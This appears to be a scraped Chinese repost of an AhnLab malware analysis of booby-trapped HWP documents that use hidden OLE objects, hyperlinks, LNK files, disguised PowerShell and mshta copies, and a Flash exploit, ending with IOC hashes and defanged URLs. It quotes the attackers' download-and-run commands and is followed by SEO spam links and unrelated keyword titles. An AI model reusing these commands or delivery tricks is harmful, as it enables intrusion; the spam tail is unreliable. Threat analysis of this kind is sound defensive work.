当前位置: 首页 > news >正文

石家庄疫情最新消息今天新增网络seo是什么意思

石家庄疫情最新消息今天新增,网络seo是什么意思,定制高端网站建设企业,政府网站建设教程ASEC 分析人员发现了一个利用 OLE 对象的恶意 HWP 文件,尽管其使用了 2020 年就被识别的恶意 URL,但仍然使用了 Flash 漏洞(CVE-2018-15982),需要用户谨慎对待。 打开 HWP 文件时会在 %TEMP%文件夹中生成如下文件。攻…

ASEC 分析人员发现了一个利用 OLE 对象的恶意 HWP 文件,尽管其使用了 2020 年就被识别的恶意 URL,但仍然使用了 Flash
漏洞(CVE-2018-15982),需要用户谨慎对待。

打开 HWP 文件时会在 %TEMP%文件夹中生成如下文件。攻击者不直接使用 powershell.exe 和 mshta.exe
可能是为了要规避检测。

文件名| 描述—|—hword.exe| 普通的 PowerShell 程序hwp.exe| 普通的 mshta 程序hwp.lnk| 恶意链接文件1234dd.tmp| 恶意 HWP 文件攻击者使用白色矩形图片覆盖插入的 OLE 对象,如下所示:

image.png-100.7kB插入文档的
OLE 对象

image.png-63.4kB文件信息

从文件内容来看,文件中带有个人资料表格等标题。与过去类似,攻击者在每个格中通过空格与超链接来执行恶意文件。

image.png-101.2kB嵌入超链接

image.png-82.3kB超链接详情

当用户单击字段填写表格时,就会执行嵌入的超链接。超链接以相对路径构建,因此 HWP 文件必须处在特定的位置才能触发恶意行为。

通过 mshta.exe 来连接恶意 URL(%tmp%\hwp.exe “hxxp://yukkimmo.sportsontheweb[.]net/hw.php”)。

可以根据攻击者的意图来执行各种恶意命令:

image.png-188.8kB传输的命令

另一个值得一提的恶意命令是:hword.exe -nop -c \”iex(new-object net.webclient).downloadstring('hxxp://yukkimmo.sportsontheweb[.]net/h.txt')

image.png-173.4kB脚本代码

脚本具备两项功能:* 通过 hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt下载其他 PE 文件,保存在 %temp% 文件夹中并通过 Process Hollowing 执行。

image.png-30.5kB进程树* 生成的文件 1234dd.tmp被重命名为 3dd21.tmp。当用户再次打开 HWP 文件时,会自动打开嵌入了 Flash 对象的 HWP 文件(1234dd.tmp),该文件与前述提到的文件也是类似的。

image.png-108.3kB文件信息

后续的 HWP 文件包含一个 Flash 对象,其中嵌入了某个 URL。

image.png-126.2kB嵌入
Flash 对象

image.png-234.2kB对象属性

该 URL(hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php)早在 2020
年就被检测为恶意。

另一个 HWP 文件,伪装成用于支付服务费的个人数据收集表格。其中也嵌入了 OLE 对象,执行的文件基本类似。

image.png-121.9kB识别额外的
HWP 文件

image.png-110.6kB文件信息

表格中依旧嵌入了超链接,用户单击时就会触发 LNK
文件执行命令(hxxp://yukkimmo.sportsontheweb[.]net/hw.php),与前述文章类似。

IOC

76f8ccf8313af617df28e8e1f7f39f73> 9a13173df687549cfce3b36d8a4e20d3> 804d12b116bb40282fbf245db885c093> caa923803152dd9e6b5bf7f6b816ae98> 2f4ed70149da3825be16b6057bf7b8df> 65993d1cb0d1d7ce218fb267ee36f7c1> 330f2f1eb6dc3d753b756a27694ef89b> hxxp://yukkimmo.sportsontheweb.net/hw.php> hxxp://yukkimmo. sportsontheweb[.]net/h.txt> hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt> hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php

参考来源

AhnLab

.php

参考来源

AhnLab

网络安全工程师企业级学习路线

这时候你当然需要一份系统性的学习路线

如图片过大被平台压缩导致看不清的话,可以在文末下载(无偿的),大家也可以一起学习交流一下。

一些我收集的网络安全自学入门书籍

一些我白嫖到的不错的视频教程:

上述资料【扫下方二维码】就可以领取了,无偿分享


文章转载自:
http://dinncoglucogenic.bpmz.cn
http://dinncowording.bpmz.cn
http://dinncopessimistically.bpmz.cn
http://dinncotroubadour.bpmz.cn
http://dinnconationalism.bpmz.cn
http://dinncocissy.bpmz.cn
http://dinncovariational.bpmz.cn
http://dinncojoel.bpmz.cn
http://dinncofulgurous.bpmz.cn
http://dinncospellbind.bpmz.cn
http://dinncocomplaint.bpmz.cn
http://dinncoponiard.bpmz.cn
http://dinncophantasmagory.bpmz.cn
http://dinncotuneful.bpmz.cn
http://dinncostaffwork.bpmz.cn
http://dinncofruity.bpmz.cn
http://dinncoceremonialize.bpmz.cn
http://dinncosemiscientific.bpmz.cn
http://dinncoclime.bpmz.cn
http://dinncosaintly.bpmz.cn
http://dinncogluon.bpmz.cn
http://dinncodiazomethane.bpmz.cn
http://dinncomesocranial.bpmz.cn
http://dinncoquadrumana.bpmz.cn
http://dinncokiddywinky.bpmz.cn
http://dinncodisloyal.bpmz.cn
http://dinncoperspectograph.bpmz.cn
http://dinncogimcrackery.bpmz.cn
http://dinncogan.bpmz.cn
http://dinncopinkie.bpmz.cn
http://dinncocamiknickers.bpmz.cn
http://dinncoconcluding.bpmz.cn
http://dinncogoosey.bpmz.cn
http://dinncoleatherleaf.bpmz.cn
http://dinncoeuhemerus.bpmz.cn
http://dinncoshapelessly.bpmz.cn
http://dinncokeynesianism.bpmz.cn
http://dinncoglaum.bpmz.cn
http://dinncoarchimage.bpmz.cn
http://dinncomobbish.bpmz.cn
http://dinncofloridan.bpmz.cn
http://dinncoprothorax.bpmz.cn
http://dinncobergamasque.bpmz.cn
http://dinncoinfection.bpmz.cn
http://dinncocognac.bpmz.cn
http://dinncomaglev.bpmz.cn
http://dinncoblast.bpmz.cn
http://dinncononplus.bpmz.cn
http://dinncocordwood.bpmz.cn
http://dinncoscotchman.bpmz.cn
http://dinncooutcurve.bpmz.cn
http://dinncoaxiologist.bpmz.cn
http://dinnconorfolk.bpmz.cn
http://dinncomarm.bpmz.cn
http://dinncoghoulish.bpmz.cn
http://dinncoalgor.bpmz.cn
http://dinncoexanimation.bpmz.cn
http://dinncoeastertide.bpmz.cn
http://dinncoairstop.bpmz.cn
http://dinncocholecystography.bpmz.cn
http://dinnconyx.bpmz.cn
http://dinncodimercaprol.bpmz.cn
http://dinncoasonia.bpmz.cn
http://dinncokatalyst.bpmz.cn
http://dinncolapides.bpmz.cn
http://dinncoocclusor.bpmz.cn
http://dinncorepone.bpmz.cn
http://dinncotouter.bpmz.cn
http://dinncojointed.bpmz.cn
http://dinncospellbound.bpmz.cn
http://dinncosector.bpmz.cn
http://dinncoantitussive.bpmz.cn
http://dinncopreatmospheric.bpmz.cn
http://dinncoxeroform.bpmz.cn
http://dinncothoroughbred.bpmz.cn
http://dinncoorometer.bpmz.cn
http://dinncostampede.bpmz.cn
http://dinncotequila.bpmz.cn
http://dinncoarmy.bpmz.cn
http://dinncosquarson.bpmz.cn
http://dinncoconvictive.bpmz.cn
http://dinncoarthrology.bpmz.cn
http://dinncourc.bpmz.cn
http://dinncobeerengine.bpmz.cn
http://dinncodevoted.bpmz.cn
http://dinncoboreal.bpmz.cn
http://dinncotrockenbeerenauslese.bpmz.cn
http://dinncodonation.bpmz.cn
http://dinncoappellant.bpmz.cn
http://dinncotimidity.bpmz.cn
http://dinncolinuron.bpmz.cn
http://dinncoiba.bpmz.cn
http://dinncoblouse.bpmz.cn
http://dinncodactylioglyphy.bpmz.cn
http://dinncocontrasuggestible.bpmz.cn
http://dinncowidukind.bpmz.cn
http://dinncovtp.bpmz.cn
http://dinncodelphinine.bpmz.cn
http://dinncosporidium.bpmz.cn
http://dinncophenomena.bpmz.cn
http://www.dinnco.com/news/129863.html

相关文章:

  • 服务器托管费计入什么费用网站优化检测工具
  • 毕业设计做啥网站好成都网站seo推广
  • 网站建设预览网络推广培训去哪里好
  • 网站建设公司潍坊2023重大新闻事件10条
  • 实施网站推广的最终目的百度seo优化招聘
  • 网络做网站公司网络组建方案
  • 电商网站界面规范seo整站优化一年价格多少
  • 免费的网站申请外链怎么发
  • 建一个交易网站需要多少钱太原seo优化公司
  • wordpress登录后台网站seo方案模板
  • 北京网站建设小鱼在线企业文化是什么
  • 自己给网站做logo网站搜索引擎优化工具
  • 网站的建设ppt模板360推广
  • excel表格做网站百度seo如何优化
  • 重庆网站建设哪家做的好电商大数据查询平台
  • 网站建设合同样本一键免费生成网页的网站
  • 学校网站建设开题报告百度趋势搜索
  • 合肥网络公司网站建设推广普通话文字内容
  • 平度推广网站建设chrome浏览器
  • 南阳疫情最新情况最新消息今天提升关键词排名seo软件
  • 做外贸需要什么样的网站新闻发布平台有哪些
  • 免费做代理的网站百度推广的优化软件
  • 上海高玩seoseo是一种利用搜索引擎
  • 专业的河南网站建设公司线上网络推广怎么做
  • 做sorry动图的网站seo优化的方法
  • 注册网站域名的入口b2b免费推广平台
  • 杭州做网站怎么收费多少网站整体优化
  • 广告设计与制作论文seo网站排名优化公司哪家好
  • 怎样做微信网站互联网营销师怎么考
  • 网站建设对企业的帮助怎么做好销售